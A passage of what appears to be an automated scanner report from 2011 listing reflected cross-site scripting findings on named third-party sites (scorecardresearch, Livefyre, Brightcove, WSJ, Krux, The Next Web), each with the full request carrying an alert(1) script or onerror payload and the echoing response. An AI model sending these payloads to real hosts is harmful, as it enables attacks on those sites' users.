Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:31 GMT
Date: Wed, 05 Oct 2011 20:41:31 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"15b3bf<script>alert(1)</script>03c12efd9cd", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 6f66a<script>alert(1)</script>43bf8311a42 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com6f66a<script>alert(1)</script>43bf8311a42&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:33 GMT
Date: Wed, 05 Oct 2011 20:41:33 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com6f66a<script>alert(1)</script>43bf8311a42", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload bd710<script>alert(1)</script>074d9a138e3 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=bd710<script>alert(1)</script>074d9a138e3&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:35 GMT
Date: Wed, 05 Oct 2011 20:41:35 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ength-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"bd710<script>alert(1)</script>074d9a138e3", c6:"", c10:"", c15:"", c16:"", r:""});



3.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6c111<script>alert(1)</script>7afe3df289e was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=6c111<script>alert(1)</script>7afe3df289e&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:37 GMT
Date: Wed, 05 Oct 2011 20:41:37 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"6c111<script>alert(1)</script>7afe3df289e", c10:"", c15:"", c16:"", r:""});



3.57. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/bootstrap/1872433 [max_followers parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/bootstrap/1872433

Issue detail

The value of the max_followers request parameter is copied into the HTML document as plain text between tags. The payload afc43<script>alert(1)</script>4d89496ca7d was submitted in the max_followers parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/bootstrap/1872433?order=-created&max_comments=50&max_followers=10afc43<script>alert(1)</script>4d89496ca7d&conv_meta=%7B%22source_url%22%3A%22http%3A%2F%2Fthenextweb.com%2Finsider%2F2011%2F06%2F25%2Fwhy-turntable-fm-is-the-most-exciting-social-service-of-the-year%2F%22%7D&url=http%253A%2F%2Fthenextweb.com%2Finsider%2F2011%2F06%2F25%2Fwhy-turntable-fm-is-the-most-exciting-social-service-of-the-year%2F&host=thenextweb.com&lftoken= HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
Origin: http://thenextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: ORIGIN, ROXY_CONNECTION, X_FORWARDED_PROTO, ACCEPT_CHARSET, OST, ACCEPT, CONNECTION, REFERER, USER_AGENT, ACCEPT_LANGUAGE, X_VARNISH, X_FORWARDED_PORT, X_FORWARDED_FOR, ACCEPT_ENCODING
Access-Control-Allow-Methods: POST, GET
Access-Control-Allow-Origin: http://thenextweb.com
Access-Control-Max-Age: 1728000
Content-Type: application/json
Date: Wed, 05 Oct 2011 20:42:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie
Content-Length: 173
Connection: keep-alive

{"msg": "Unable to convert parameter 'max_followers': invalid literal for int() with base 10: '10afc43<script>alert(1)</script>4d89496ca7d'", "status": "error", "code": 400}

3.58. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 54636<script>alert(1)</script>ac5c7dfe9fc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback54636<script>alert(1)</script>ac5c7dfe9fc&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:41 GMT
Expires: Wed, 05 Oct 2011 21:41:41 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding,Cookie
Content-Length: 400
Connection: keep-alive

LF.initCallback54636<script>alert(1)</script>ac5c7dfe9fc({"status": "ok", "code": 200, "data": {"assets_version": "76531571", "script_url": "http://zor.fyre.co/wjs/v1.0.76531571/javascripts/livefyre.js", "conv": {"status": "ok", "allow_comments": true, "par
...[SNIP]...

3.59. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the site_id request parameter is copied into the HTML document as plain text between tags. The payload a3092<script>alert(1)</script>9b6aa7e9a44 was submitted in the site_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback&url=http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/&site_id=289775a3092<script>alert(1)</script>9b6aa7e9a44&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:55 GMT
Expires: Wed, 05 Oct 2011 21:41:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 189
Connection: keep-alive

LF.initCallback({"msg": "Unable to convert parameter 'site_id': invalid literal for int() with base 10: '289775a3092<script>alert(1)</script>9b6aa7e9a44'", "status": "error", "code": 400});

3.60. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bootstrap.thenextweb.fyre.co
Path:   /api/v1.1/public/init.js

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f2672<script>alert(1)</script>5e44580f52b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/v1.1/public/init.js?callback=LF.initCallback&url=f2672<script>alert(1)</script>5e44580f52b&site_id=289775&conv_meta=%7B%22source_url%22%3A%22http%3A//thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/%22%7D HTTP/1.1
Host: bootstrap.thenextweb.fyre.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Cache-Control: max-age=3600
Content-Type: application/javascript
Date: Wed, 05 Oct 2011 20:41:48 GMT
Expires: Wed, 05 Oct 2011 21:41:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 170
Connection: keep-alive

LF.initCallback({"msg": "Unable to convert parameter 'url': Invalid url: f2672<script>alert(1)</script>5e44580f52b, missing URL scheme", "status": "error", "code": 400});

3.61. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 37c51<script>alert(1)</script>d62efdff90b was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAipOTmrk~,ppF_qxBkWm4G-M_tDdbW6qnuU4iUxLyo HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 593
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1&isUI=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q24034edff8e3e8a393a3c0d1c6b7a66f67b19ee1
cccom.brightcove.experience.ViewerExperienceRequest.deliveryType.ex
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 20:44:22 GMT
Server:
Content-Length: 4359

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
aRrsW ..eAQ~~,AAAAipOTmrk~,ppF_qxBkWm4G-M_tDdbW6qnuU4iUxLyo.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bq    m&......ivideoPlayer37c51<script>alert(1)</script>d62efdff90b.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

3.62. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the absolutePath request parameter is copied into the HTML document as plain text between tags. The payload 19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10 was submitted in the absolutePath parameter. This input was echoed as 19ab8<img src=a onerror=alert(1)>f0332744d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js19ab8<img%20src%3da%20onerror%3dalert(1)>f0332744d10&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 05 Oct 2011 21:11:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255121

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOne({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg40.js19ab8<img src=a onerror=alert(1)>f0332744d10","data":"if (typeof dojo !== \"undefined\") {\n dojo.provide(\"blueKai.blueKai\");\n}\n\n/* global blueKai document unescape */\nif (typeof blueKai === \"undefined\") {\n\tblueKai = {};\n}\nvar KRUXS
...[SNIP]...

3.63. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cc.wsj.net
Path:   /cdssvco/file/v2/Files

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload ce8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb was submitted in the c parameter. This input was echoed as ce8ce<img src=a onerror=alert(1)>000d54995fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cdssvco/file/v2/Files?absolutePath=%2Fdjscript%2Fbucket%2FNA_WSJ_PUB%2Fpage%2F0_0_WG_HeaderOne%2Fprovided%2Fj_global_slim%2Fversion%2Fvblg40.js&absolutePath=%2Fpublic%2Fpage%2FNA_WSJ_PUB%3A0_0_WG_HeaderOne-none-vblg40.html&c=dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOnece8ce<img%20src%3da%20onerror%3dalert(1)>000d54995fb HTTP/1.1
Host: cc.wsj.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://blogs.wsj.com/venturecapital/?mod=tech
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Restlet-Framework/2.0.3
Accept-Ranges: bytes
Vary: Accept-Charset,Accept-Encoding,Accept-Language,Accept
Content-Type: application/x-javascript
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-DEBUG-EMGSESSIONID: NULL
Date: Wed, 05 Oct 2011 21:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 255121

dj.module._fileServiceDao.fragment_NA_WSJ_PUB_0_0_WG_HeaderOnece8ce<img src=a onerror=alert(1)>000d54995fb({"files":[{"absolutePath":"/djscript/bucket/NA_WSJ_PUB/page/0_0_WG_HeaderOne/provided/j_global_slim/version/vblg40.js","data":"if (typeof dojo !== \"undefined\") {\n dojo.provide(\"blueKai.blueKai\")
...[SNIP]...

3.64. http://cdn.krxd.net/config/ [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload fc5e3<script>alert(1)</script>85758782c82 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=nbcnewyork.comfc5e3<script>alert(1)</script>85758782c82&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b012

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=8156 t=1317838794651252
X-Served-By: logger-b005.krxd.net
Content-Length: 97
Date: Wed, 05 Oct 2011 18:19:54 GMT
Connection: close

{"error": "Non existant site for NBCU - nbcnewyork.comfc5e3<script>alert(1)</script>85758782c82"}

3.65. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f823</script><script>alert(1)</script>c8ab89aca16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content2f823</script><script>alert(1)</script>c8ab89aca16/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:15 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=no7uktdtj2g425naatuucumc56; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:55:41 GMT
Age: 1
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
type="text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
    'current_url': '/wp-content2f823</script><script>alert(1)</script>c8ab89aca16/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff'
    };
</script>
...[SNIP]...

3.66. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.thenextweb.com
Path:   /wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9191</script><script>alert(1)</script>ac3d12fa4c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/themesb9191</script><script>alert(1)</script>ac3d12fa4c7/tnw_6/static/fonts/proximanova-regular-webfont.woff HTTP/1.1
Host: cdn.thenextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ocmx_mobile=normal

Response

HTTP/1.1 404 Not Found
x-backend: 172.20.0.144
Set-Cookie: ocmx_mobile=deleted; expires=Tue, 05-Oct-2010 20:42:36 GMT; path=/; domain=.thenextweb.com
Set-Cookie: ocmx_mobile=normal; path=/; domain=.thenextweb.com
Set-Cookie: PHPSESSID=fs3arhagkauo11vuarn53uu023; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://thenextweb.com/xmlrpc.php
Last-Modified: Wed, 05 Oct 2011 20:42:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
Content-Length: 26123
Date: Wed, 05 Oct 2011 20:56:02 GMT
Age: 0
X-Cache: MISS
Proxy-Connection: keep-alive
Via: http/1.1 edge07.lax.netdna.com (ApacheTrafficServer/2.1.4-unstable [cMsSf ])
Server: ATS/2.1.4-unstable

<!DOCTYPE html>
<html dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8" />
<title>Not Found</tit
...[SNIP]...
text/javascript">
    var $_CONFIG = {
    'site_url': 'http://thenextweb.com',
    'theme_url': 'http://thenextweb.com/wp-content/themes/tnw_6',
